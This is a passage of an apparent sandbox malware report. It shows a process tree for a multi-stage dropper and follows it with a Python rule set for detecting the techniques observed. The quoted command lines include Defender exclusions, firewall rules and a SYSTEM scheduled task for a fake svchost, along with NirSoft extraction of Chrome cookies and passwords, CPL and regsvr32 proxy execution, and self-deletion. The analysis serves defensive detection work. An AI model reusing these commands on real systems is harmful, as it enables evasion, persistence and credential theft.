                cmd: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                PID 2728
            [7] C:\Users\Admin\AppData\Local\Temp\11111.exe
                cmd: C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                PID 6100
                (NirSoft command-line switches, matching the WebBrowserPassView/Nirsoft yara hits above: the first run exports the Chrome cookie database in cookies.txt format, the second saves recovered browser passwords as a tab-delimited file, both into fj4ghga23_fsa.txt for collection)
          [6] C:\Users\Admin\Pictures\Adobe Films\Avk2EJbFUsCIGK5bsZwiZYCd.exe
              PID 3840
            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                PID 4484
                (excludes the whole Windows directory from scanning, which covers the C:\Windows\System\svchost.exe dropped below)
            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                PID 5396
                (note the trailing space: "C:\Windows \" is a separate directory that ordinary Win32 path handling cannot address, hence the \\?\ prefix)
            [7] C:\Windows\System32\netsh.exe
                cmd: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                PID 5792
            [7] C:\Windows\System\svchost.exe
                cmd: "C:\Windows\System\svchost.exe" formal
                PID 2156
                (not the Windows service host: the genuine svchost.exe lives in System32 and SysWOW64; this is a dropped binary under C:\Windows\System)
            [7] C:\Windows\SYSTEM32\schtasks.exe
                cmd: schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                PID 5900; Creates scheduled task(s)
                (runs the fake svchost as SYSTEM every 7 minutes until the end date 11/02/2024)
            [7] C:\Windows\System32\netsh.exe
                cmd: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                PID 5348
          [6] C:\Users\Admin\Pictures\Adobe Films\gESi6jZe4XXubaqPsnZBzWnB.exe
              PID 4940
          [6] C:\Users\Admin\Pictures\Adobe Films\Y34pZCu0tloDrEzADK1GfR0B.exe
              PID 4544
            [7] C:\Windows\SysWOW64\WerFault.exe
                cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 124
                PID 2480; Program crash
          [6] C:\Users\Admin\Pictures\Adobe Films\mL_OP84SRxNpVqtwErqce4eu.exe
              PID 3200
          [6] C:\Users\Admin\Pictures\Adobe Films\wVrl_RNkDhDjjzFBnSphJP3Q.exe
              PID 4252
          [6] C:\Users\Admin\Pictures\Adobe Films\A6jOeaLH4C4GdpYuyL71mml1.exe
              PID 4600
          [6] C:\Users\Admin\Pictures\Adobe Films\2OlzyWgRpkMlYDzuqkjfiqtu.exe
              PID 4476
            [7] C:\Users\Admin\Pictures\Adobe Films\2OlzyWgRpkMlYDzuqkjfiqtu.exe
                cmd: "C:\Users\Admin\Pictures\Adobe Films\2OlzyWgRpkMlYDzuqkjfiqtu.exe" -u
                PID 5640
      [4] C:\Windows\SysWOW64\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /c Sat123037f78f205c.exe
          PID 588; Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat123037f78f205c.exe
            cmd: Sat123037f78f205c.exe
            PID 1912; Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
            (the process that enabled every privilege in its token, see AdjustPrivilegeToken above)
          [6] C:\Windows\SysWOW64\cmd.exe
              cmd: cmd.exe /c taskkill /f /im chrome.exe
              PID 1680
            [7] C:\Windows\SysWOW64\taskkill.exe
                cmd: taskkill /f /im chrome.exe
                PID 4264; Kills process with taskkill
                (closing the browser releases the locks on its credential and cookie databases before they are read)
      C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 780]
        cmdline: C:\Windows\system32\cmd.exe /c Sat128942fc3c9a4e75.exe
        - Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat128942fc3c9a4e75.exe  [depth 5, PID 1876]
          cmdline: Sat128942fc3c9a4e75.exe
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          C:\Users\Admin\AppData\Local\c8418d7b-b6c4-4659-b441-07aac87c585e.exe  [depth 6, PID 3212]
            cmdline: "C:\Users\Admin\AppData\Local\c8418d7b-b6c4-4659-b441-07aac87c585e.exe"
            - Executes dropped EXE
          C:\Users\Admin\AppData\Local\82479f0a-b741-43b9-b53a-c3bb2ed58093.exe  [depth 6, PID 4244]
            cmdline: "C:\Users\Admin\AppData\Local\82479f0a-b741-43b9-b53a-c3bb2ed58093.exe"
            - Executes dropped EXE
            - Adds Run key to start application
            C:\Users\Admin\AppData\Roaming\57308631\5207433252074332.exe  [depth 7, PID 5116]
              cmdline: "C:\Users\Admin\AppData\Roaming\57308631\5207433252074332.exe"
              - Executes dropped EXE
          C:\Users\Admin\AppData\Local\51bda4e0-9596-4be7-9c5f-e572e49e6715.exe  [depth 6, PID 3772]
            cmdline: "C:\Users\Admin\AppData\Local\51bda4e0-9596-4be7-9c5f-e572e49e6715.exe"
            - Executes dropped EXE
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - Suspicious behavior: EnumeratesProcesses
          C:\Users\Admin\AppData\Local\c134ee86-6bbb-4bdb-a875-483c4d842708.exe  [depth 6, PID 3956]
            cmdline: "C:\Users\Admin\AppData\Local\c134ee86-6bbb-4bdb-a875-483c4d842708.exe"
            - Executes dropped EXE
            - Suspicious use of NtSetInformationThreadHideFromDebugger
          C:\Users\Admin\AppData\Local\3d6b2b16-1850-4c63-bc54-1df3e7a2977a.exe  [depth 6, PID 4568]
            cmdline: "C:\Users\Admin\AppData\Local\3d6b2b16-1850-4c63-bc54-1df3e7a2977a.exe"
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
            C:\Users\Admin\AppData\Roaming\4898359.exe  [depth 7, PID 3048]
              cmdline: "C:\Users\Admin\AppData\Roaming\4898359.exe"
              C:\Windows\SysWOW64\control.exe  [depth 8, PID 5040]
                cmdline: "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\5wSR6.cPL",
                C:\Windows\SysWOW64\rundll32.exe  [depth 9, PID 508]
                  cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\5wSR6.cPL",
      C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 912]
        cmdline: C:\Windows\system32\cmd.exe /c Sat1266d17883454b1.exe
        - Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1266d17883454b1.exe  [depth 5, PID 1492]
          cmdline: Sat1266d17883454b1.exe
          - Executes dropped EXE
          C:\Windows\SysWOW64\cmd.exe  [depth 6, PID 3340]
            cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im Sat1266d17883454b1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1266d17883454b1.exe" & del C:\ProgramData\*.dll & exit
            C:\Windows\SysWOW64\taskkill.exe  [depth 7, PID 1300]
              cmdline: taskkill /im Sat1266d17883454b1.exe /f
              - Kills process with taskkill
      C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 1088]
        cmdline: C:\Windows\system32\cmd.exe /c Sat1283d3fd9a.exe
        - Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1283d3fd9a.exe  [depth 5, PID 2084]
          cmdline: Sat1283d3fd9a.exe
          - Executes dropped EXE
          C:\Users\Admin\AppData\Local\Temp\11111.exe  [depth 6, PID 2984]
            cmdline: C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            - Executes dropped EXE
          C:\Users\Admin\AppData\Local\Temp\11111.exe  [depth 6, PID 4592]
            cmdline: C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            - Executes dropped EXE
      C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 1208]
        cmdline: C:\Windows\system32\cmd.exe /c Sat12faf3464bdfb3c.exe
        C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12faf3464bdfb3c.exe  [depth 5, PID 2724]
          cmdline: Sat12faf3464bdfb3c.exe
          - Executes dropped EXE
          C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12faf3464bdfb3c.exe  [depth 6, PID 3208]
            cmdline: "C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12faf3464bdfb3c.exe" -u
            - Executes dropped EXE
      C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 1360]
        cmdline: C:\Windows\system32\cmd.exe /c Sat1296f0ebf057bb0b.exe
        C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1296f0ebf057bb0b.exe  [depth 5, PID 3264]
          cmdline: Sat1296f0ebf057bb0b.exe
          - Executes dropped EXE
      C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 2384]
        cmdline: C:\Windows\system32\cmd.exe /c Sat125bf3a6108a6f5e.exe
        C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat125bf3a6108a6f5e.exe  [depth 5, PID 4184]
          cmdline: Sat125bf3a6108a6f5e.exe
          - Executes dropped EXE
          C:\Windows\SysWOW64\regsvr32.exe  [depth 6, PID 4692]
            cmdline: "C:\Windows\System32\regsvr32.exe" /U QHCb.Lp0 /s
            - Loads dropped DLL
      C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 1784]
        cmdline: C:\Windows\system32\cmd.exe /c Sat127b52b8f420b.exe
        C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat127b52b8f420b.exe  [depth 5, PID 2876]
          cmdline: Sat127b52b8f420b.exe
          - Executes dropped EXE
          - Modifies registry class
          C:\Windows\SysWOW64\control.exe  [depth 6, PID 2108]
            cmdline: "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\Dhz0.cpl",
            C:\Windows\SysWOW64\rundll32.exe  [depth 7, PID 4552]
              cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\Dhz0.cpl",
              - Loads dropped DLL
      C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 1616]
        cmdline: C:\Windows\system32\cmd.exe /c Sat126518fd66e0120.exe
        C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat126518fd66e0120.exe  [depth 5, PID 4748]
          cmdline: Sat126518fd66e0120.exe
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 2748]
        cmdline: C:\Windows\system32\cmd.exe /c Sat12b734b9ff65fd19.exe
        C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12b734b9ff65fd19.exe  [depth 5, PID 4980]
          cmdline: Sat12b734b9ff65fd19.exe
          - Executes dropped EXE
          - Checks SCSI registry key(s)
          - Suspicious behavior: EnumeratesProcesses
      C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 3840]
        cmdline: C:\Windows\system32\cmd.exe /c Sat12d67b11255d.exe
        C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12d67b11255d.exe  [depth 5, PID 4216]
          cmdline: Sat12d67b11255d.exe
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12d67b11255d.exe  [depth 6, PID 3128]
            cmdline: C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12d67b11255d.exe
          C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12d67b11255d.exe  [depth 6, PID 1944]
            cmdline: C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12d67b11255d.exe
      C:\Windows\SysWOW64\cmd.exe  [depth 4, PID 1916]
        cmdline: C:\Windows\system32\cmd.exe /c Sat12285b225fb.exe /mixtwo
        C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12285b225fb.exe  [depth 5, PID 1964]
          cmdline: Sat12285b225fb.exe /mixtwo
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12285b225fb.exe  [depth 6, PID 1572]
            cmdline: Sat12285b225fb.exe /mixtwo
            - Executes dropped EXE
            C:\Windows\SysWOW64\cmd.exe  [depth 7, PID 2040]
              cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "Sat12285b225fb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12285b225fb.exe" & exit
              C:\Windows\SysWOW64\taskkill.exe  [depth 8, PID 3856]
                cmdline: taskkill /im "Sat12285b225fb.exe" /f
                - Kills process with taskkill
                - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\rundll32.exe  [depth 1, PID 2344]
  cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
  C:\Windows\SysWOW64\rundll32.exe  [depth 2, PID 4652]
    cmdline: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\system32\svchost.exe  [depth 1, PID 4316]
  cmdline: C:\Windows\system32\svchost.exe -k SystemNetworkService
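Several branches of this tree are detection opportunities in their own right: the persistence cluster at the top (a svchost.exe copy in C:\Windows\System, a directory Windows ships no svchost.exe in, the paired netsh "SvcHostX" allow rules for it, and the "Timer" task that runs it as SYSTEM every 7 minutes), the Control Panel proxy executions through control.exe and rundll32 Shell32.dll,Control_RunDLL on .cpl files in Temp, the silent regsvr32 /U ... /s load of a file named QHCb.Lp0, the taskkill-and-del / erase self-removal one-liners, the 11111.exe run that reads the Chrome Cookies database, and the rundll32 spawned by wmiprvse.exe. The following is an added example, not part of the sandbox report, of a small rule set run over process-creation events constructed from the command lines above; the event field names (pid, parent, image, cmdline), the trusted-directory lists and the rule names are assumptions of this example, and parent is left empty where the page does not show it.

```python
# Added example, not part of the sandbox report: replay process-creation events
# shaped like the tree above and flag the techniques it shows. EVENTS is
# constructed from the report's own command lines; the field names and the
# allow-lists below are this example's assumptions, not a sandbox/Sysmon schema.
import re
from typing import Dict, List

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
PROGRAM_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")
SYSTEM_NAMES = {"svchost.exe", "rundll32.exe", "regsvr32.exe", "control.exe", "netsh.exe", "schtasks.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
WMI_CHILD_LOLBINS = {"rundll32.exe", "regsvr32.exe", "cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe"}

EVENTS: List[dict] = [  # constructed from the report; parent is "" where the page does not show it
    dict(pid=2156, parent="", image=r"C:\Windows\System\svchost.exe",
         cmdline=r'"C:\Windows\System\svchost.exe" formal'),
    dict(pid=5792, parent="", image=r"C:\Windows\System32\netsh.exe",
         cmdline=r'"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in '
                 r'action=allow program="C:\Windows\System\svchost.exe" enable=yes'),
    dict(pid=5900, parent="", image=r"C:\Windows\SYSTEM32\schtasks.exe",
         cmdline=r'schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM'),
    dict(pid=508, parent=r"C:\Windows\SysWOW64\control.exe", image=r"C:\Windows\SysWOW64\rundll32.exe",
         cmdline=r'"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\5wSR6.cPL",'),
    dict(pid=4692, parent=r"C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat125bf3a6108a6f5e.exe",
         image=r"C:\Windows\SysWOW64\regsvr32.exe", cmdline=r'"C:\Windows\System32\regsvr32.exe" /U QHCb.Lp0 /s'),
    dict(pid=3340, parent=r"C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1266d17883454b1.exe",
         image=r"C:\Windows\SysWOW64\cmd.exe",
         cmdline=r'"C:\Windows\System32\cmd.exe" /c taskkill /im Sat1266d17883454b1.exe /f & timeout /t 6 & '
                 r'del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1266d17883454b1.exe" & del C:\ProgramData\*.dll & exit'),
    dict(pid=2984, parent=r"C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1283d3fd9a.exe",
         image=r"C:\Users\Admin\AppData\Local\Temp\11111.exe",
         cmdline=r'C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile '
                 r'"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt'),
    dict(pid=2344, parent=r"C:\Windows\system32\wbem\wmiprvse.exe", image=r"C:\Windows\system32\rundll32.exe",
         cmdline=r'rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global'),
    dict(pid=4316, parent="", image=r"C:\Windows\system32\svchost.exe",  # benign control: must stay clean
         cmdline=r"C:\Windows\system32\svchost.exe -k SystemNetworkService"),
]


def _base(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def _outside_trusted(path: str) -> bool:
    return not path.lower().startswith(SYSTEM_DIRS + PROGRAM_DIRS)


def detect(ev: dict) -> List[str]:
    img, cmd = ev["image"].lower(), ev["cmdline"].lower()
    base, parent = _base(img), _base(ev["parent"])
    hits: List[str] = []
    # 1. a core binary name running from a directory it does not live in
    #    (C:\Windows\System\svchost.exe is not C:\Windows\System32\svchost.exe)
    if base in SYSTEM_NAMES and not img.startswith(SYSTEM_DIRS):
        hits.append("masqueraded system binary")
    # 2. netsh allow rule whose program= target sits outside the trusted directories
    m = re.search(r'advfirewall firewall add rule.*?program="([^"]+)"', cmd)
    if m and _outside_trusted(m.group(1)):
        hits.append("firewall allow rule for non-standard binary")
    # 3. scheduled task running as SYSTEM whose /tr action sits outside the trusted directories
    m = re.search(r'schtasks.*?/create.*?/tr\s+(?:"([^"]+)"|(\S+))', cmd)
    if m and "/ru system" in cmd and _outside_trusted(m.group(1) or m.group(2)):
        hits.append("SYSTEM scheduled task running non-standard binary")
    # 4. Control Panel item loaded from a user-writable path (control.exe -> rundll32 Control_RunDLL)
    m = re.search(r'([a-z]:\\[^"]*?\.cpl)\b', cmd)
    if base in ("control.exe", "rundll32.exe") and m and _outside_trusted(m.group(1)):
        hits.append("CPL proxy execution from user-writable path")
    # 5. regsvr32 run silently (/s) against a file whose extension hides that it is a DLL;
    #    a plain split is enough here because the report's argument carries no spaces
    if base == "regsvr32.exe":
        toks = cmd.split()[1:]
        target = next((t for t in toks if not t.startswith("/")), "")
        if "/s" in toks and target and not target.endswith((".dll", ".ocx")):
            hits.append("regsvr32 silent load of non-DLL extension")
    # 6. cmd one-liner that kills and then deletes its own parent image (taskkill & del / erase)
    if base == "cmd.exe" and "taskkill" in cmd and re.search(r"\b(del|erase)\b", cmd) and parent and parent in cmd:
        hits.append("self-deletion via taskkill and del")
    # 7. browser cookie database opened by something that is not a browser
    if "\\user data\\default\\cookies" in cmd and base not in BROWSERS:
        hits.append("browser cookie store read")
    # 8. WMI provider host spawning a LOLBin (the report's "unexpected child process" signature)
    if parent == "wmiprvse.exe" and base in WMI_CHILD_LOLBINS:
        hits.append("wmiprvse spawned LOLBin")
    return hits


def scan(events: List[dict]) -> Dict[int, List[str]]:
    """Map each PID to the rule names it triggered; an empty list means clean."""
    return {ev["pid"]: detect(ev) for ev in events}


if __name__ == "__main__":
    for pid, hits in scan(EVENTS).items():
        print(pid, hits or "clean")
```

Rules 2 to 4 compare the path the LOLBin is asked to act on against the directories it normally references rather than matching the tool name alone, so a legitimate netsh or schtasks invocation for a binary under System32 or Program Files stays clean, and the stock svchost.exe -k SystemNetworkService event at the bottom of the tree is included as a control that must produce no hits. Rule 1 is the one that catches the C:\Windows\System copy of svchost.exe on its own, before any of its netsh or schtasks children appear.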